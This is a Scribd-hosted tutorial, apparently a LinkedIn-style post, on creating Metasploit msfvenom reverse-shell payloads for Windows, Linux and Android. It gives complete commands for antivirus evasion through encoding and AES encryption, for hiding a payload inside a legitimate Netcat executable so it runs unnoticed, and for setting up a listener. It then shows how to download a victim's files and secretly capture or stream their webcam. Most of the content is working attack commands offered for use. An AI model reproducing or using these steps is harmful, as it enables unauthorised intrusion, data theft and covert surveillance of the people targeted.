Scribd
Upload
60 views6 pages

Linkedin Payload

for payload creation

Uploaded by

210305105054
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
60 views6 pages

Linkedin Payload

for payload creation

Uploaded by

210305105054
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 6

Creating a Custom Payload Using Msfvenom

In the world of cybersecurity, payload creation is a key skill, especially for red teamers. One of the
most commonly used tools for this is Msfvenom a versatile utility from the Metasploit Framework. It
allows you to create payloads for various operating systems such as Windows, macOS, Linux, and
Android.

Types of Payloads:

 Bind Payload: The attacker connects to the victim’s machine.

 Reverse Payload: The victim’s machine connects back to the attacker (commonly used as it
bypasses firewalls more effectively).

 Windows Reverse Shell Payload


Here’s how to create a basic reverse shell payload for Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f
exe -o payload.exe

Explanation:
 msfvenom: The tool used to generate the payload.
 -p: Specifies the payload type (in this case, a reverse shell for Windows).
 LHOST: The attacker’s IP address.
 LPORT: The port on which the attacker listens for the victim’s connection. (you can
choose port according to you but generally we choose 4444)
 -f exe: Output format (Windows executable).
 -o payload.exe: Name of the output file.
Note: You can also use .msi as an output format for Windows, just like .exe.
Creating Payloads for Other OS:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f elf
-o payload.elf
For Android:

msfvenom -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -o payload.apk

Making Payloads Undetectable

To bypass antivirus detection, it's crucial to obfuscate the payload. This can be done using encoders
and encryption.

Encoder:
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 LHOST=127.0.0.1
LPORT=4444 -f exe -o ajay.exe

 -e x86/shikata_ga_nai: Specifies the encoder.

 -i 10: Applies 10 layers of encoding.

To view the available encoders, you can use the command msfvenom --list encoders

Note: Be cautious when using high iterations (e.g., 50, 100, 150) as it might cause the payload to
crash. Stick to reasonable numbers like 10 or 20 for better reliability.

Encryption

msfvenom -p windows/meterpreter/reverse_tcp --encrypt aes256 -encryption-key hello LinkedIn -f


exe -o ajay.exe
To view the available encryptions , you can use the command msfvenom --list encrypt

Embedding Payload into Another Application

For even more stealth, you can embed your payload into an existing application (such as Netcat,),
which allows the legitimate application to run normally while also executing your payload. This can
make it more difficult to detect by security systems.

msfvenom -p windows/x64/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 --encrypt aes256

-encryption-key ajay -x netcat.exe -k -f exe -o netcat.exe

 x64: Specifies the target architecture.

 -x netcat.exe: Embeds the payload into an executable (in this case, Netcat).

 -k: Allows both the original executable (Netcat) and the payload to run simultaneously.
Note: By embedding the payload, the application (Netcat) will continue to work as expected, while
your payload will be executed in the background.

Setting Up a Listener in Metasploit

After generating the payload using msfvenom, the next step is to set up a listener in Metasploit to
handle the reverse connection when the target system executes the payload. This is done using the
multi/handler module in Metasploit, which listens for incoming connections and launches the
session.

Start Metasploit Framework: Open your terminal and start Metasploit with the following command:

Msfconsole

Use the Multi/Handler Module: Once inside the Metasploit console, load the multi/handler module,
which is used to handle connections from payloads like the reverse shell.

use exploit/multi/handler

Set the Payload Type: You need to specify the type of payload you're expecting to receive. For a
Windows reverse shell, you would set it like this:

set payload windows/meterpreter/reverse_tcp

Set LHOST and LPORT: Set the IP address (LHOST) and port (LPORT) that the listener will use to wait
for the reverse shell to connect back.

set LHOST 127.0.0.1

set LPORT 4444

Start the Listener: After setting the appropriate options, run the following command to start the
listener.

Exploit or run

So it is the final command:

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set LHOST 127.0.0.1 (write your IP address)

set LPORT 4444

exploit (you can use run instead of exploit)


Downloading Files from the Target Machine
After successfully connecting to the target machine using the reverse shell payload, you can
download files from the victim’s machine.

To list the files, use the ls command and navigate to the directory containing the content you want to
download.

And write command download ajay.txt (ajay.txt file which attacker want to download)

Use cd command to change directories like cd Ajay (ajay directory name)

List the available web came use command webcam list

To take a picture using the victim’s web cam use command webcam snap

stream the Webcam

Start Webcam stream use command Webcam stream

Stop stream use command Ctrl +c in your terminal

You might also like